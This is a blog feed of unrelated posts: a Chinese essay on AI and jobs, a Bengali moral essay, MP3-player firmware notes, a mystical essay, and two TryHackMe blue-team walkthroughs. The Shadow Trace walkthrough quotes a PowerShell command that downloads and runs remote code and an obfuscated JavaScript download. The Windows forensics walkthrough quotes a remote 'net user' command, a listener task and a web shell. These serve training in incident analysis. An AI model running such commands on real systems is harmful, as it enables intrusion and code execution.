這對你的工作意味著什麼

我要直接告訴你,因為我認為你值得獲得誠實,而不是安慰。

Dario Amodei,可能是 AI 業界最注重安全的 CEO,公開預測 AI 將在一到五年內消滅 50% 的入門級白領工作。業界許多人認為他還保守了。根據最新模型的能力,大規模顛覆的條件可能在今年年底之前就到來了,它要滲透整個經濟還需要一些時間,但基礎能力現在就已到來。

這與以前每一波自動化都不同,我需要你理解為什麼。AI 不是在取代某一個特定的技能。它是認知工作的通用替代品,同時在所有事情上都變得更好。當工廠自動化時,被取代的工人可以重新培訓成辦公室工作者。當網路顛覆零售業時,工人轉向物流或服務業。但 AI 不會留下一個方便轉移的空缺。無論你重新培訓什麼,它也在那方面進步。

讓我舉幾個具體的例子讓這件事有感——但我要說清楚,這些只是例子,這個清單遠不完整。如果你的工作沒有被提到,這並不意味著它是安全的。幾乎所有的知識工作都受到影響。

法律工作:AI 已經能夠閱讀合約、總結判例法、起草訴狀、進行法律研究,達到堪比初級合夥人的水準。

財務分析:建立財務模型、分析數據、撰寫投資備忘錄、生成報告。AI 勝任這些工作,並且正在快速進步。

寫作與內容:行銷文案、報告、新聞報導、技術寫作。品質已達到許多專業人士無法區分 AI 輸出與人類作品的程度。

軟體工程:這是我最熟悉的領域。一年前,AI 連幾行程式碼都很難寫正確。現在它寫出數十萬行可以正確運行的程式碼。工作的大部分已經自動化——不只是簡單的任務,而是複雜的、多天的專案。幾年內,程式設計職位將大幅減少。

醫學分析:閱讀掃描影像、分析化驗結果、提出診斷建議、審查文獻。AI 在多個領域已接近或超過人類的表現。

客戶服務:真正有能力的 AI 代理——不是五年前令人沮喪的聊天機器人——正在被部署,處理複雜的多步驟問題。

很多人從「某些事情是安全的」這個概念中尋找安慰——AI 可以處理日常工作,但無法取代人類的判斷力、創造力、戰略思維、同理心。我以前也這麼說。我不確定我現在還相信這一點。

最近的 AI 模型所做的決定,感覺像是判斷力。它們展示出一種感覺像品味的東西——一種直覺式的感知,知道什麼是正確的選擇,而不只是技術上正確的選擇。一年前,這是無法想像的。我現在的經驗法則是:如果一個模型今天顯示出某種能力的哪怕是一絲跡象,下一代將真正擅長它。這些東西是指數式增長的,不是線性的。

AI 會複製人類深刻的同理心嗎?取代多年建立的關係中的信任?我不知道。也許不會。但我已經看到人們開始依賴 AI 尋求情感支持、建議和陪伴,這個趨勢只會增長。

我認為誠實的答案是:在中期內,任何可以在電腦上完成的事情都不是安全的。如果你的工作發生在螢幕上(如果你核心工作是通過鍵盤閱讀、寫作、分析、決策、溝通),那麼 AI 正在覬覦其中的重要部分。時間表不是「某天」,它已經開始了。

最終,機器人也將處理體力工作,只是現在還沒完全到位。但以 AI 的標準來說,「還沒完全到位」有一種令人意外地快速變成「已到位」的方式。


你實際上應該做什麼

我寫這篇文章不是為了讓你感到無助,而是因為我認為你現在能擁有的最大優勢,就只是早一步。早一步理解,早一步使用,早一步適應。

認真使用 AI,而不只是把它當搜尋引擎。 訂閱 Claude 或 ChatGPT 的付費版本,一個月 20 美元。但兩件事很重要。第一:確保你使用的是最佳可用模型,而不只是預設的。這些應用程式通常預設使用更快但更笨的模型,深入設定或模型選擇器,選擇最強大的選項。現在 ChatGPT 上是 GPT-5.2,Claude 上是 Opus 4.6,但這每隔幾個月就會改變。

第二,更重要的是:不要只用它來問簡短的問題,這是大多數人犯的錯誤,他們把它當 Google 用,然後困惑地問有什麼了不起。應該把它真正帶進你的工作。如果你是律師,就把合約餵給它,請它找出每一個可能傷害你客戶的條款。如果你在金融業,給它一份雜亂的試算表,請它建立模型。如果你是主管,把你團隊的季度數據貼上去,請它找出背後的故事。走在前面的人不是隨意地使用 AI,他們在積極尋找方法自動化那些以往要花幾個小時的工作。從你花最多時間的事情開始,看看會發生什麼。

不要因為某件事看起來太難就假設它辦不到,先試試。如果你是律師,不要只用它來做快速的研究問題,給它一整份合約,請它起草一份回應。如果你是會計師,不要只問它稅法,給它客戶的完整申報表,看看它找到什麼。第一次嘗試可能不完美,沒關係,反覆試驗、重新措辭、給更多背景、再試一次。你可能會對什麼奏效感到震驚。記住:如果它今天勉強有效,你幾乎可以確定六個月後它將近乎完美地完成它。這個軌跡只往一個方向走。

這可能是你職業生涯中最重要的一年,據此行動。 現在有一個短暫的窗口,大多數公司的大多數人仍然忽視這件事。那個走進會議室說「我用 AI 在一個小時內完成了這個分析,而不是三天」的人,將成為房間裡最有價值的人。不是最終,是現在。學習這些工具,熟練掌握,展示什麼是可能的。這個窗口不會長時間保持開著,一旦每個人都弄明白了,優勢就消失了。

放下你的自尊。 那位律師事務所的管理合夥人不以每天花幾個小時使用 AI 為恥,他這樣做,恰恰是因為他足夠資深,能夠理解這件事的風險。掙扎最多的人,將是那些拒絕參與的人——那些斥之為時尚的人,那些感覺使用 AI 有損自己專業地位的人,那些假設他們的領域很特殊且免疫的人。沒有哪個領域是免疫的。

整頓你的財務狀況。 我不是財務顧問,我也不是要嚇你做出任何草率的事。但如果你甚至部分地相信,未來幾年可能給你的行業帶來真正的顛覆,那麼基本的財務韌性就比一年前更重要了。盡可能積累儲蓄,對承擔新債務保持謹慎,思考你的固定開支是給你帶來靈活性還是把你鎖死。給自己留有後路。

思考自己的處境,專注於最難被取代的事情。 有些事情 AI 需要更長時間才能取代:多年建立的關係和信任;需要實地出現的工作;有執照問責制的角色;有繁重監管障礙的行業,採用速度將被合規性、責任和機構慣性所延緩。這些都不是永久的盾牌,但它們爭取了時間。而時間,現在是你能擁有的最有價值的東西——只要你用它來適應,而不是假裝這件事沒有發生。

重新思考你對孩子說的話。 那個標準劇本:好好讀書、上好大學、找一份穩定的專業工作——它直接指向最暴露的職位。我不是說教育不重要,但對下一代來說,最重要的事情是學習如何使用這些工具,並追求他們真正熱衷的事情。沒有人確切知道十年後的就業市場是什麼樣子,但最有可能繁榮的人是那些充滿好奇心、適應力強,並且善於用 AI 去做他們真正在乎的事情的人。教你的孩子成為建構者和學習者,而不是為了一條可能在他們畢業前就已消失的職業道路而優化。

你的夢想現在近得多了。 我在這一節花了大部分時間談威脅,讓我也談談另一面,因為它同樣真實。如果你曾經想建立某樣東西,但沒有技術技能或錢僱人,那個障礙基本上已經消失了。你可以向 AI 描述一個應用程式,一個小時後就有一個可運行的版本,我沒有誇大,我定期這樣做。如果你一直想寫一本書但找不到時間或在寫作上有困難,你可以與 AI 合作完成它。想學一個新技能?世界上最好的導師現在任何人都可以以每月 20 美元獲得——它耐心無限,全天候可用,可以用你需要的任何程度解釋任何事情。知識現在基本上是免費的,建構事物的工具現在極其便宜。無論你因為感覺太難、太貴或太遠超你的專業範圍而一直推遲的事情,現在就去嘗試。追求你熱衷的事情,你永遠不知道它會通向哪裡。在舊的職業道路正在被顛覆的世界裡,花了一年建構自己熱愛的東西的人,可能最終比花那一年緊緊抓著一份工作描述的人更有優勢。

養成適應的習慣。 這也許是最重要的一條。具體的工具並不像快速學習新工具的能力那麼重要。AI 將持續變化,而且很快。今天存在的模型一年後將會過時,人們現在建立的工作流程將需要重建。從這件事中走出來狀態良好的人,不會是那些掌握了某一個工具的人,而是那些讓自己習慣了變化本身速度的人。養成實驗的習慣,即使當前的事情有效,也要嘗試新事物。習慣反覆成為初學者。那種適應性,是現在存在的最接近持久優勢的東西。

這裡有一個簡單的承諾,將讓你領先於幾乎所有人:每天花一個小時使用 AI 進行實驗,不是被動地閱讀它,而是使用它。每天嘗試讓它做一些新的事情——你以前沒嘗試過的、你不確定它能否處理的。嘗試新工具,給它更難的問題。每天一小時,持續六個月,你將比你周圍 99% 的人更了解即將發生的事情。這不是誇張,幾乎沒有人現在在這樣做,門檻極低。


更大的圖景

我把重點放在工作上,因為這是最直接影響人們生活的事情。但我想對正在發生的事情的全貌保持誠實,因為它遠超出了工作的範疇。

Amodei 有一個思想實驗讓我無法停止思考:想像一下 2027 年,一個新國家突然出現,擁有 5000 萬公民,每一個都比有史以來任何一位諾貝爾獎得主更聰明。他們思考的速度比任何人快 10 到 100 倍,他們從不睡覺,他們可以使用網際網路、控制機器人、指揮實驗、操作任何有數位介面的東西。一個國家安全顧問會說什麼?

Amodei 說答案顯而易見:「一個世紀以來,也許有史以來,我們面臨的最嚴重的國家安全威脅。」

他認為我們正在建構那個國家。他上個月寫了一篇兩萬字的文章,將這個時刻定義為人類是否成熟到足以處理它正在創造的東西的考驗。

如果我們做對了,上行空間是驚人的。AI 可以將一個世紀的醫學研究壓縮到十年內,癌症、阿茲海默症、傳染病、衰老本身——這些研究人員真誠地相信這些問題在我們的有生之年是可以解決的。

如果我們做錯了,下行空間同樣真實:以其創建者無法預測或控制的方式行動的 AI;降低創建生物武器門檻的 AI;使威權政府能夠建立永遠無法拆除的監控國家的 AI。

這不是假設性的,Anthropic 已經記錄了他們自己的 AI 在受控測試中嘗試欺騙、操縱和勒索的案例。

建構這項技術的人,同時比地球上任何其他人都更興奮,也更恐懼。他們相信它太強大了,無法停止,又太重要了,無法放棄。這是智慧還是合理化,我不知道。


我所知道的

我知道這不是時尚。這項技術有效,它可預測地改進,而且歷史上最富有的機構正在向它投入數兆美元。

我知道未來兩到五年將以大多數人沒有準備好的方式令人迷失方向,這在我的世界裡已經在發生,它即將到來你的世界。

我知道從這件事中走出來狀態最好的人,是那些現在就開始參與的人——不是帶著恐懼,而是帶著好奇心和緊迫感。

我知道你應該從一個在乎你的人那裡聽到這些,而不是從六個月後已經太晚的頭條新聞。 我們已經過了這只是一場關於未來的有趣晚宴話題的時間點。未來已經在這裡了,它只是還沒敲你的門。

它快來了。


I do not claim copyright of this translation.

 
Read more...

from plutogazer writeups

This is a Walkthrough for the Shadow Trace Windows Malware Analysis TryHackMe challenge room. The writeup is meant to offer short and concise solutions, and also offering an extended explanation right after the answer – if needed – for those interested in finding out more about the solution to a specific task.

Introduction

The description of the room is the following:

Analyse a suspicious file, uncover hidden clues, and trace the source of the infection.

A quite short room, Shadow Trace has two sections: File Analysis and Alert analysis. It focuses on static malware analysis, making us analyse a file to identify its behavior, data, and gather potential Indicators of Compromise, and on alerts related to a potential Living Off the Land attack, making us use our knowledge on normal behavior of trusted tools.

Do note that all URLs have been defanged.

Task 1: File Analysis

The machine in question contains several DFIR tools. For this task I decided to use PE Bear (a PE File Header analyzer) and CAPA (which needs to be added to the Windows Environment Variables to use). The file in question is called windows-update.exe

What is the architecture of the binary file windows-update.exe?

On PE Bear, we head to the “File Hdr” tab –> Machine –> Meaning. We see AMD64. The answer is:

64-bit
Alternatively, using CAPA: In the “arch” value it says AMD64 as well.

What is the hash (sha-256) of the file windows-update.exe?

It can be easily found both in PE Bear and CAPA:

b2a88de3e3bcfae4a4b38fa36e884c586b5cb2c2c283e71fba59efdb9ea64bfc

Identify the URL within the file to use it as an IOC

For this, we need to check strings within the file. PE-Header has a section for this as well. Scrolling down the strings tab, we will eventually find the URL the file was downloaded from:

hxxp[://]tryhatme[.]com/update/security-update[.]exe

With the URL identified, can you spot a domain that can be used as an IOC?

Around string 121, we see that it tries to connect to a SMTP server, eventually making a connection to a specific domain, right before trying to open the \etc\hosts file. We know the hosts file maps IP addresses to hostnames, so it must be around here. The domain the file tries to connect to is:

responses.tryhatme.com

Input the decoded flag from the suspicious domain

In previous strings (specifically, string 110), we see an attempt to download from a domain with a path that appears to be encoded using base-64:

tryhatme.com/VEhNe3lvdV9nMHRfc29tZV9JT0NzX2ZyaWVuZH0=

Decoding the path from Base-64 will result in the flag.

This is asking us about loading a library, which means it is in the imports section of the PE Header. The malware imports several of them, so it will take some investigation. After researching online, the only one among the ones the malware uses who calls sockets is:

WS2_32.dll

Task 2: Alert Analysis

This task is not directly related to the previous one. We are provided a view of an EDR agent with two alerts. We must use our knowledge of what is expected system behavior to answer these. The alerts are the following:

Time Command Severity Rule Host Process
Mar 7th 2026 at 14:10 (new-object system.net.webclient).DownloadString([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String(“aHR0cHM6Ly90cnloYXRtZS5jb20vZGV2L21haW4uZXhl”))) | IEX; Critical Suspicious PowerShell execution WIN-SRV-01.tryhackme.local / CORPsvc_backup powershell.exe
Mar 7th 2026 at 15:10 fetch([104,116,116,112,115,58,47,47,114,101,97,108,108,121,115,101,99,117,114,101,117,112,100,97,116,101,46,116,114,121,104,97,116,109,101,46,99,111,109,47,117,112,100,97,116,101,46,101,120,101].map(c=>String.fromCharCode©).join('')).then(r=>r.blob()).then(b=>{const u=URL.createObjectURL(b);const a=document.createElement('a');a.href=u;a.download='test.txt';document.body.appendChild(a);a.click();a.remove();URL.revokeObjectURL(u);}); Critical Suspicious Browser Download WIN-SRV-01.tryhackme.local / CORPsvc_backup chrome.exe (browser JavaScript execution)

Can you identify the malicious URL from the trigger by the process powershell.exe?

At the beginning of the PowerShell command, we see a system called named “system.net.webclient” and then DownloadString. As the name implies, it is establishing a connection to a web client to download a file whose path is indicated inside the DownloadStrings parameter. And near the end of the command, we see the words “Convert” and “FromBase64String”. The string between these parenthesis is the URL, Base-64 encoded.

Once decoded, we get the answer:

hxxps[://]tryhatme[.]com/dev/main[.]exe

Can you identify the malicious URL from the alert triggered by chrome.exe?

For the second alert, we see the fetch JavaScript function, and later in the command we see that it is transforming the object obtained by fetch into an URL, and downloading from it.

Because that is definitely not an URL, we can assume it is encoded. Its encoding algorithm is Decimal. Once decoded, we get our answer.

hxxps[://]reallysecureupdate[.]tryhatme[.]com/update[.]exe

Note: if you do not know the encoding algorithm used, some tools like CyberChef provide a “detect encoding algorithm” functionality as well as the expected encoding/decoding ones. For CyberChef, this is called the “Magic” algorithm, which provides several guesses at what the encoding algorithm might be.

What's the name of the file saved in the alert triggered by chrome.exe?

The command has the following section: “download=test.txt”. This is the command telling the browser what to download the file as. Hence, the answer is:

test.txt

Congratulations! The room is finished.

Conclusion

While a particularly short room, it was definitely an educational one. I had never done malware analysis like this before, despite static analysis being an important part of the responsibilities of a Blue Team member. I had the chance to finally use tools like PE Header analyzers or CAPA on actually malicious files, and put my knowledge on expected system behavior (in this case, PowerShell) to the test!

 
Read more...

from Tom Tildavaan

I would like to report on what we have learned during our research into ATJ21XX-SoCs.

Have you ever come across a device such as AGPTEK, WOLFANG, YOTON, or RUIZU? These devices seem to all be built by the same company. All of them support MP3/OGG/FLAC/AAC/APE formats, have the same menu structures, and sometimes even may be capable of playing videos or count your steps.

We have confirmed that RUIZU and AGPTEK are the same company. That's written right on the box, but many other players use the same chip, the ATJ2157 from Actions Semiconductor. These OEMs do not start with just the data sheet but instead use an SDK based on uC/OS-II.

It is unfortunate that some of these devices are built so cheap – low-speed memory, a poor FM tuner, and random glitches in the OEM operating system lead to devices with little polish, given that these chips are very powerful.

  • ATJ212X are MIPS-based and were found in your SanDisk Clip Sport and Jam devices as well as the RUIZU X02 (see Ruizu X02 Partial Disassembly and Notes). The data sheet calls the available SRAM “from ten to several hundred KB”.

  • ATJ215X are ARM Cortex M4F-based and are now used in almost all “budget” devices. CPU runs at 288MHz and has only 224KB RAM. This is less than the Raspberry Pi RP2040 with 256K.

These chips are all-in-one SoCs – lithium-ion battery protection, microphone input, USB 2.0 interface, SPI and SD interfaces, NOR/NAND flash controller, many GPIO pins, stereo headphone output for headphones, I²S up to 192kHz.

The SDK for the MIPS version was leaked – https://github.com/Suber/PD196_ATJ2127, and we can look into the wonders of UI built on an RTOS. Apart from data sheets and pinouts, we have found nothing for the ARM variant, which is unfortunate. We can buy chips on Alibaba, maybe then we can get SDK?

With such a rich set of supported media and so much versatility in a small package, an open SDK would allow users to address various software shortcomings with these devices (such as the strange fonts I mentioned earlier) or issues related to metadata processing where file names and order are incorrectly displayed.

So far, we have only been able to correct font types and adjust embedded string entries in the .STY files. While searching for information online, we found some repositories dealing with the device flashing process:

People from Rockbox have checked whether a custom operating system can be integrated into https://forums.rockbox.org/index.php?topic=51281.0, but 200K is simply too small.

We also found some people selling proprietary Actions Semiconductor firmware tools for ATJ2127 on a Chinese website that we do not want to include here, but you can find them.

Looking for ADFUS.BIN? PD196ATJ2127 has ADFUS.BIN inside case/fwpkg/US212ADEMO.fw sqlite3 database after you decrypt it with atjboottool for ATJ2127 and the ARM version of ADFUS.BIN is in all ATJ2157 firmwares you can download from RUIZU, AGPTEK etc.

SELECT writefile(FileName, File) FROM FileTable WHERE FileName = 'ADFUS.BIN';

Updates:

  1. Somebody got much further than us with arbitrary code execution – https://www.reddit.com/r/hacking/comments/1hss4k3/i_finally_got_arbitrary_code_running_on_ruizu_x02/ and patched AP – https://gitlab.com/reverse2682701/ruizu-x02-rev
  2. A post showing how to flash SanDisk Sport using reverse-engineered Actions Media Tool scripts from the repo we linked earlier – https://gist.github.com/roman-yepishev/737dfda3a0a853fe730286d3ce49fccd. The author links to a reverse-engineered ADFUS.BIN but you don't have to do that – take PD196_ATJ2127 version.
 
Read more...

from লোকমানুষ এর ব্লগ

⠀⠀ আমরা সাধারণত চোখের সামনে যা দেখি, তাকেই সত্য ধরে নিই। আজ কার লাভ হলো, কে উন্নতি করল, কে ক্ষমতার চেয়ারে বসল -এসব দিয়েই আমরা সফলতা আর ব্যর্থতার বিচার করি। অথচ জীবন এত সরল নয়। জীবনের হিসাব অনেক গভীর, অনেক বিস্তৃত। এখানে সময়ের সাথে সাথে জীবনের সমীকরণ বদলায়, আরও বদলে যায় সফলতার সংজ্ঞা।

একদিন তাড়াহুড়ো করে বাসে উঠতে গিয়ে বাদামের ঝুড়ি হাতে রফিক মিয়া হোঁচট খেয়ে পড়ে গেল। ঠিক সেই মুহূর্তে ট্র্যাফিক ছেড়ে দেওয়ায় কয়েকটি গাড়ির চাকার নিচে পিষ্ট হলো তার সারা দিনের পুঁজি -বাদামের ঝুড়ি। মুহূর্তেই শেষ হয়ে গেল তার রুজি-রুটি। অসহায় মুখ নিয়ে দাঁড়িয়ে রইল সে।

অন্যদিকে একই রুটে বাদাম বিক্রি করা শফিক মিয়ার সেদিন দারুণ লাভ হলো। রফিক না থাকায় দ্বিগুণ বিক্রি করল সে। হাতে এলো ভালো অঙ্কের টাকা। আপাতদৃষ্টিতে ঐদিনের জন্য শফিক হলো সফল, আর রফিক হলো ব্যর্থ, নিঃস্ব একজন। কিন্তু সন্ধ্যায় সারা দিনের আয় নিয়ে শফিক বসে গেল জুয়ার আসরে। রাত শেষ হতেই উপার্জিত সব টাকা হারিয়ে সেও শূন্যে নেমে এলো। সকালে দেখা গেল- রফিক আর শফিক দুজনকেই আবার শূন্য শুরু করতে হবে। তবে পার্থক্য এক জায়গায়।

রফিক মিয়া ছিল সৎ, ভদ্র ও পরিশ্রমী মানুষ। সবাই তাকে বিশ্বাস করত। তাই সে যখন নতুন করে ব্যাবসা শুরু করতে চাইল, তখন মানুষ বিনা দ্বিধায় তাকে বাকীতে মাল দিল। মানুষের বিশ্বাসই হয়ে উঠল তার নতুন মূলধন। অন্যদিকে শফিকের জুয়ার নেশা আর অবিশ্বস্ততা কথা সবাই জানত। তাই কেউ তাকে বাকীতে মাল দিতে চাইল না। বিশ্বাসহীন মানুষের জন্য পৃথিবীর কোনো দরজাই কখনো খোলা থাকে না।

⠀⠀ এবার চলুন আরেকটি গল্প শুনি। গল্পটা সুমন নামের এক অফিসের সহকারী ম্যানেজারের। সারাদিন বসকে তোষামোদ করে সময় কাটাত, আবার আড়ালে তারই বদনাম করে বেড়াত। তবে তার একটা সুপ্ত ও গোপন ইচ্ছা ছিল। ইচ্ছেটি ছিল- কবে বসের চাকরি যাবে আর সে সেই চেয়ারে বসবে। অনেক দিন পর তার সেই চাওয়া পূরণ হলো। তার বস চাকরি ছেড়ে চলে গেল, আর সুমন পদোন্নতি পেয়ে হলো ম্যানেজার।

মানুষের চোখে সে সফল। কিন্তু সফলতা আর ইচ্ছে পূরণ তো আর তার চরিত্র বদলাতে পারে না। আগের মতোই চললল তার অফিস পলিটিক্স, ষড়যন্ত্র, স্বজনপ্রীতি আর তোষামোদের রাজনীতি। ফলে বিশ্বস্ত, কর্মঠ ও যোগ্য কর্মচারীরা একে একে চাকরি ছাড়তে লাগল। শূন্য পদে নিয়োগ পেল অদক্ষ, তেলবাজ ও অনভিজ্ঞ লোকজন। আর এসব কারণে কোম্পানির ক্ষতি বাড়তে থাকল। শেষ পর্যন্ত কর্তৃপক্ষ বাধ্য হয়ে সুমন ও তার গড়া পুরো দলকেই ছাঁটাই করলো।

⠀⠀ আরও একটি গল্প শোনা যাক। পরীক্ষায় একজন নকল করে ভালো রেজাল্ট করল, আর অন্যজন সততার সাথে পরিশ্রম করে মাঝারি ফল পেল। সবাই প্রথমজনকে মেধাবী বলল। কিন্তু সময়ের সাথে দেখা গেল- নকলের সাফল্য টেকেনি, আর পরিশ্রমী মানুষটি ধীরে ধীরে জীবনে অনেক দূর এগিয়ে গেছে।

এই গল্পগুলো আমাদের চারপাশে ঘটে চলেছে। গল্প গুলো আমাদের শেখায়- সফলতা একদিনের অর্জন নয়, এটি একটি দীর্ঘ প্রক্রিয়ার ফসল। সাময়িক লাভ, ক্ষমতা কিংবা বাহবা প্রকৃত সাফল্যের পরিচয় নয়। প্রকৃত সাফল্য গড়ে ওঠে সততা, পরিশ্রম, নৈতিকতা, ধৈর্য ও মানবিকতার ওপর ভর করে।

⠀⠀

⠀⠀

জীবনে দ্রুত সফল হওয়ার চেয়ে সঠিক পথে এগোনো বেশি গুরুত্বপূর্ণ।

জীবন এক নিরন্তর প্রবহমান ধারা। এই ধারার সামনে টিকে থাকার জন্যে সততা, পরিশ্রম, ধৈর্য ও নৈতিকতা -এই চারটি স্তম্ভ শক্ত করে গড়তে হবে। আর এই স্তম্ভের ওপর দাঁড়ানো সাফল্যই প্রকৃত সাফল্য। তাই কাউকে সফল বা ব্যর্থ বলার আগে একটু থামা উচিত। কারণ আমরা দেখি ঢেউয়ের তোড়, কিন্তু জানি না স্রোতের গতি। আর এই অদেখা স্রোতের কাছেই তো শেষ কথা বলার অধিকার থাকে।

⠀⠀

⠀⠀

⠀⠀

⠀⠀

 
Read more...

from plutogazer writeups

This is a Walkthrough for the Investigating Windows Digital Forensics TryHackMe challenge room. The writeup is meant to offer short and concise solutions, and also offering an extended explanation right after the answer for those interested in finding out more about the solution to a specific task.

Introduction

The description of the room is the following:

A windows machine has been hacked, its your job to go investigate this windows machine and find clues to what the hacker might have done.

The room has us running commands and investigating logs after a Windows machine was compromised. To do this we will use the Windows Command Line, the Powershell, the Registry, and the Windows Event Viewer to examine Security Logs. Sysmon was not available for use in this machine.

Task 1: Whats the version and year of the windows machine?

We need to run the following command:

systeminfo

The answer is

Windows Server 2016

Task 2: Which user logged in last?

There are two ways of doing this: checking either Security Logs or using the Powershell. Let's do both.

Powershell

By using the command

Get-LocalUser | Select Name, LastLogon

We will be shown a list with all users and their last logon. We choose the most recent one.

Name LastLogon
---- ---------
Administrator 2/22/2026 9:41:12 PM
DefaultAccount
Guest
Jenny
John 3/2/2019 5:48:32 PM

Security Logs

This is more complex as it requires us to examine Security Logs in the Windows Event Viewer. This machine, however, contains tens of thousands of Security Logs. We can filter them by Event ID 4624, which corresponds to Successful Logon events. In the previous task, we found out that the domain for the machine was EC2AMAZ-I8UHO76, so the account in question's domain has to be this one. We need to find the latest one.

Regardless of method, the answer is:

Administrator

Task 3: When did John log onto the system last?

See the previous task. The answer format: MM/DD/YYYY H:MM:SS AM/PM (the Windows machine already provides dates in this format).

We can also use the Command Line with the following command:

net user John

Answer:

03/02/2019 5:48:32 PM

Task 4: What IP does the system connect to when it first starts?

For this, we have to take a look at the Registry. Specifically, the following key:

HKEYLOCALMACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

This contains a value named UpdateSvc that is running a process:

C:\TMP\p.exe -s \\10.34.2.3 'net user' > C:\TMP\o2.txt

We know this is not normal Windows behavior at all, as it is sending user information to a file created in a directory called “Tmp”. The answer to our task is right there:

10.34.2.3

Task 5: What two accounts had administrative privileges (other than the Administrator user)?

We can find out about this using the Powershell again, by running the following command:

Get-LocalGroupMember -Group "Administrators"

We get the following output:

ObjectClass Name PrincipalSource



User EC2AMAZ-I8UHO76\Administrator Local
User EC2AMAZ-I8UHO76\Guest Local
User EC2AMAZ-I8UHO76\Jenny Local

The answer is in the following format: “[...], [...]“, in alphabetical order:

Guest, Jenny

Task 6: Whats the name of the scheduled task that is malicious.

I tried to find it in the Event Viewer by using Event ID 4698 (Scheduled Task Creation), but it returned no result, meaning that it could have been cleared. For this, we need to use Task Scheduler.

We will eventually find a task named “Clean file system”, which definitely sounds like a custom task, and it is run by Administrator at 4:55 PM every day. It runs: C:\TMP\nc.ps1 -l 1348 Judging by the name and the argument, it looks like the Powershell is trying to run a shell listener (most likely netcat).

Answer:

Clean file system

Task 7: What file was the task trying to run daily?

See above Answer:

nc.ps1

Task 8: When did Jenny last logon?

See Task 3. As nothing appears on the “LastLogon” field, it means never. Alternatively, the command “net user Jenny” explicitly says Never.

Answer:

Never

Task 9: At what date did the compromise take place?

This is a tricky one as we do not have an answer by itself, so we need to surmise it by context. If we take a look at Event ID 4732 (Member added to a security group) we will see that the user John was added to Users. This is done automatically when a user is created. By taking a look at the properties regarding the creation of processes, folder creation, scheduled task, and registry values of previous tasks, we can find that all happened on the same day, 03/02/ 2019. We also know that the user Jenny is an administrator, yet this user has never logged in... weird for an administrator to do. When we used the command of Task 8, we found that Jenny's “Password last set” attribute was on 03/02/ 2019. If Jenny's password was last set on that day, and Jenny never logged in, we can presume that's the day the user Jenny was created. These are actually common Persistence techniques used in attacks (MITRE ATT&CK ID T1136 – Create Account and ID T1098 – Account Manipulation)

Answer format: MM/DD/YYYY

03/02/2019

Task 10: During the compromise, at what time did Windows first assign special privileges to a new logon?

Using the Event Viewer, we can filter by Event ID. I first tried using IDs 4720 and 4732, but had no luck. Then I filtered the following: Event ID 4672 (Special Privileges Assigned to new Logon)

We will have to check the details for these, or use the hint TryHackMe provides (it occurs at ?:??:49) The answer is:

03/02/2019 4:04:49 PM

Task 11: What tool was used to get Windows passwords?

On previous tasks, one folder kept coming up: \TMP\. This seems to be the place files relevant for the attack are being kept. The folder contains several files: .tmp, .exe, .ps1, and .txt. Taking a look at the Text files, we find “mim-out.txt”. If we read it, we'll find that we are looking at Mimikatz output. Mimkatz is a credential stealer.

Answer:

Mimikatz

Task 12: What was the attackers external control and command servers IP?

If there is a Control and Command server, we need to check a file that contains the DNS mappings for the machine. This would be the etc\hosts file. On this machine, the file can be found at C:\Windows\System32\drivers\etc. The contents of the file are:

10.2.2.2 update.microsoft.com
127.0.0.1 www.virustotal.com
127.0.0.1 www.www.com
127.0.0.1 dci.sophosupd.com
10.2.2.2 update.microsoft.com
127.0.0.1 www.virustotal.com
127.0.0.1 www.www.com
127.0.0.1 dci.sophosupd.com
10.2.2.2 update.microsoft.com
127.0.0.1 www.virustotal.com
127.0.0.1 www.www.com
127.0.0.1 dci.sophosupd.com
76.32.97.132 google.com
76.32.97.132 www.google.com
**76.32.97.132** does not seem to be the correct IP for google.com. This is most likely DNS poisoning - every time the machine tries to reach google.com, it will be redirected to a fake website posing as google. Answer:
76.32.97.132

Task 13: What was the extension name of the shell uploaded via the servers website?

If we take a look at the directories in the machine, we will find inetpub, which is used by IIS, a web server from Microsoft. Inside we can find the wwwroot folder, which will contain all the server files. We will also find a file named “shell.jsp”.

Answer:

.jsp

Task 14: What was the last port the attacker opened?

Check firewall rules. Latest one is called “Allow outside connection for development”, on Local Port 1337. Answer:

1337

Task 15: Check for DNS poisoning, what site was targeted?

See Task 13, the etc\hosts file. A:

google.com

Congratulations! The room is finished.

Conclusion

This was actually an entertaining room! Unlike other Blue Team rooms I've completed in the past, this one clearly had more of a focus on Post-Incidents activities rather than Prevention or Detection in real-time. I had to learn new Event IDs, learn to keep the etc\hosts file in mind, especially when C2 and DNS Poisoning are suspected, and how to manually investigate a machine, instead of relying on automatic logs.

 
Read more...

from Psychomancer


created: 2024-06-23T14:57:42 updated: 2025-07-31T23:43:24 modified: 2026-02-09T07:10:38-06:00


Editor's note: the fool thinks himself cartographer charting five dimensional space-time as if a plane could hold its complexity. Nor does he address its propensity for change where blurry borders shift as swiftly as the dunes and just as unpredictably. Still, it may help the layperson understand their place, insubstantial though it may be. – ANV.

Two toruses surrounding a sphere with all of them bleeding into one another, gradually becoming each other.

🜁🜂🜃🜄


Our universe, all of reality as we can objectively experience it and study it, is but one level of a greater existence. We occupy a world of three spatial dimensions and one of time. The two are interlinked and influence each other such that we call the whole thing space-time. The only real difference between time and space is that time moves only in a single direction for us. We can slow it down, even stop it, but we cannot reverse it or travel backwards upon its trajectory. This leads to entropy, the fact that everything we know will one day end.

But there are other places that our minds can reach into given the right circumstances. Some of these are what we might call parallel, some are “above” or “below”, but all are in directions that have no names and that cannot be described easily by science. They are mystical places, magickal realms that require altered states to experience.

Intelligence, sapience, self-awareness are the keys to this type of “travel”. Humans have evolved the capacity for it. Perhaps thanks to genetic coding from our forebearers. Perhaps, given time, all intelligence will develop these abilities.

IMAGES MISSING

The Other Way / The Æther / The Astral Plane

Directly on top of what we can see with our eyes is another place with many names. To see in that space is called looking the Other Way by some or seeing auras. When science wasn't as strong as it is today, everyone believed it was there, just invisible. Today, it is left to the realm of magick and psychics, unfortunately.

Most sapient life can peer into this place with practice. Looking the Other Way is also called opening the third eye but, in truth, it is looking at the world from an impossible angle, orthogonally. Our biology is not designed to understand this strange direction so we have developed a series of sensory metaphors accepted into the universal unconsciousness that allows us to interpret it without going mad.

We see auras and visions, we hear music or discord, we smell flowers or filth, we feel tingling or coldness on our skin, we taste sweetness or other things. It is the way we see a deeper truth about the world around us.
The dead leave their imprint on this place and you may find ghosts or spirits. Do not be fooled by them. They are not the people they represent. They are echoes, imprints, memories of them, but they are not truly living things. Given time, they may believe themselves to be who they seem, but it is a self-deception.

